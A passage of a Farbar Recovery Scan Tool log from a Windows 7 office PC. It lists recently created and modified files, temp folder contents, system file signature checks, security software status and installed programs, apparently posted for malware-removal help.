2014-08-06 03:00 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-08-06 03:00 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-08-06 03:00 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-08-06 03:00 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-06 03:00 - 2014-06-05 07:45 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-08-06 03:00 - 2014-06-05 07:26 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-08-06 03:00 - 2014-06-05 07:25 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-08-06 03:00 - 2014-04-11 19:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-08-06 03:00 - 2014-04-11 19:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-08-06 03:00 - 2014-04-11 19:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 14:19 - 2014-08-28 14:19 - 00015266 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 14:19 - 2014-08-28 14:18 - 00000000 ____D () C:\FRST
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 14:01 - 2014-08-28 13:58 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 14:01 - 2013-02-11 20:05 - 01470582 _____ () C:\Windows\WindowsUpdate.log
2014-08-28 14:00 - 2014-08-28 13:58 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:53 - 2014-01-09 12:48 - 00000636 _____ () C:\Windows\Tasks\TSOLnkUpdAlertTask.job
2014-08-28 13:51 - 2014-08-27 14:54 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-28 13:51 - 2014-02-21 13:38 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Spotify
2014-08-28 13:51 - 2013-04-29 10:25 - 00000856 __RSH () C:\Users\mike\ntuser.pol
2014-08-28 13:51 - 2013-04-29 10:25 - 00000000 ____D () C:\Users\mike
2014-08-28 13:50 - 2013-04-12 14:32 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 12:33 - 2013-04-12 16:22 - 00000000 ____D () C:\Quote
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-28 07:23 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-28 07:23 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-28 07:06 - 2014-02-21 13:39 - 00000000 ____D () C:\Users\mike\AppData\Local\Spotify
2014-08-28 07:05 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-28 07:05 - 2009-07-13 21:51 - 00039406 _____ () C:\Windows\setupact.log
2014-08-27 19:57 - 2013-08-20 12:08 - 00000000 ____D () C:\Users\mike\AppData\Local\ESET
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:09 - 2014-08-27 15:04 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:55 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:36 - 2009-07-13 22:13 - 00786558 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-27 14:27 - 2014-08-27 14:51 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:29 - 2014-08-27 13:21 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:20 - 2014-08-27 13:03 - 00000000 ____D () C:\temp
2014-08-27 13:07 - 2014-08-27 13:06 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:06 - 2013-02-11 20:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:03 - 2013-08-22 10:52 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Deployment
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:00 - 2013-02-11 20:07 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-08-27 13:00 - 2013-02-11 20:07 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-08-27 12:07 - 2014-08-27 11:50 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:27 - 2013-06-24 16:07 - 539952258 _____ () C:\Windows\MEMORY.DMP
2014-08-27 11:27 - 2013-06-24 16:07 - 00000000 ____D () C:\Windows\Minidump
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-27 11:03 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:37 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-02-11 20:23 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:34 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:33 - 2014-08-21 09:32 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:33 - 2009-07-13 21:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-15 13:20 - 2013-04-12 16:21 - 00000000 ____D () C:\Users\Public\QpipeWrk
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-13 06:56 - 2013-04-29 10:35 - 00011261 _____ () C:\Users\mike\Desktop\TIME SHEET Estimators.xlsx
2014-08-06 03:48 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-08-06 03:11 - 2009-07-13 21:45 - 00347632 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-06 03:10 - 2010-11-20 20:47 - 00252980 _____ () C:\Windows\PFRO.log
2014-08-06 03:09 - 2010-11-21 00:17 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-06 03:09 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-08-06 03:03 - 2013-04-12 15:03 - 00000000 ____D () C:\ProgramData\Microsoft Help

Some content of TEMP:
====================
C:\Users\mike\AppData\Local\Temp\ProcExp64.exe
C:\Users\networkadmin\AppData\Local\Temp\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
C:\Users\networkadmin\AppData\Local\Temp\InitBDE.exe
C:\Users\networkadmin\AppData\Local\Temp\raptrpatch.exe
C:\Users\networkadmin\AppData\Local\Temp\raptr_stub.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-27 00:18

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 25-08-2014
Ran by mike at 2014-08-28 14:19:45
Running from C:\Users\mike\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 13.2.1 - Hewlett-Packard) Hidden
Adobe Acrobat X Standard - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-BA7E-000000000005}) (Version: 10.1.11 - Adobe Systems)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.176 - Adobe Systems Incorporated)
AMD Accelerated Video Transcoding (Version: 13.30.100.40417 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Control Center (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.15 - Advanced Micro Devices, Inc.) Hidden
BioAPI Framework (Version: 1.0.2 - Dell Inc.) Hidden
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
CCMComInterface (HKLM-x32\...\{2D57AD48-76B0-4CFE-A4D2-3A23B465CC6E}) (Version: 8.00.0005 - Toshiba America Information System Inc.)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{3E7E6F1E-7376-475A-8BC9-E3126B20CF5F}) (Version: 1.0.198 - Citrix)
Citrix Online Launcher (HKLM-x32\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Crystal Reports 2008 Runtime SP2 (HKLM-x32\...\{C484CC8D-03CF-4022-89C4-DB4F02E8A15B}) (Version: 12.2.0.290 - Business Objects)
Custom (Version: 01.00.00.000 - Wave Systems Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5971CA1F-6BDE-498F-952C-9F2BF94070A4}) (Version:  - Microsoft)
Dell Client System Update (HKLM-x32\...\{04566294-A6B6-4462-9721-031073EB3694}) (Version: 1.3.0 - Dell Inc.)
Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 2.2.00001.001 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
DellAccess (Version: 01.01.00.104 - Wave Systems Corp.) Hidden
EMBASSY Client Core (Version: 01.01.00.036 - Wave Systems Corp.) Hidden
e-Office Manager 4.0  (HKLM-x32\...\{80826A80-9322-48FD-BC20-E0E84CCDEBC1}) (Version: 4.1.0 - Harrison Publishing House/D3)
ESET Endpoint Antivirus (HKLM\...\{3187B3B0-3620-4459-A983-4403FC481420}) (Version: 5.0.2214.4 - ESET, spol. s r.o.)
Express Piping Workstation (HKLM-x32\...\Express Piping Workstation) (Version:  - Quote Software)
Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.1.0.1055 - Citrix Online, a division of Citrix Systems, Inc.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® IPP Run-Time Installer 7.0 for Windows (HKLM-x32\...\{84C1ACA3-C1A7-4B31-A6C1-1018A481BDFE}) (Version: 7.00.0000 - Toshiba Corp.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.20.1337 - Intel Corporation)
Intel® Network Connections 17.3.63.0 (HKLM\...\PROSetDX) (Version: 17.3.63.0 - Intel)
Intel® Network Connections 17.3.63.0 (Version: 17.3.63.0 - Intel) Hidden
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.2.0.1006 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.6.245 - Intel Corporation)
Intel® Trusted Connect Service Client (Version: 1.26.242.3 - Intel Corporation) Hidden
Jabra PC Suite 2.10.3050 (HKLM-x32\...\{4F75AE17-7642-4401-AA3B-C6A45EF55008}) (Version: 2.10.3050.0 - GN Netcom A/S)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
KIP Request 6 (HKLM-x32\...\{C0333997-7B38-416D-B69B-206CC24A9F7C}) (Version: 6.201.6549 - KIP)
Lead Tools Runtime (HKLM-x32\...\Lead Tools Runtime) (Version:  - )
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Version: 4.5.51209 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual Basic PowerPacks 1.2 (HKLM-x32\...\{5169D2E2-0B94-3320-8C7A-718F92BE20CE}) (Version: 9.0.30729 - Microsoft)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
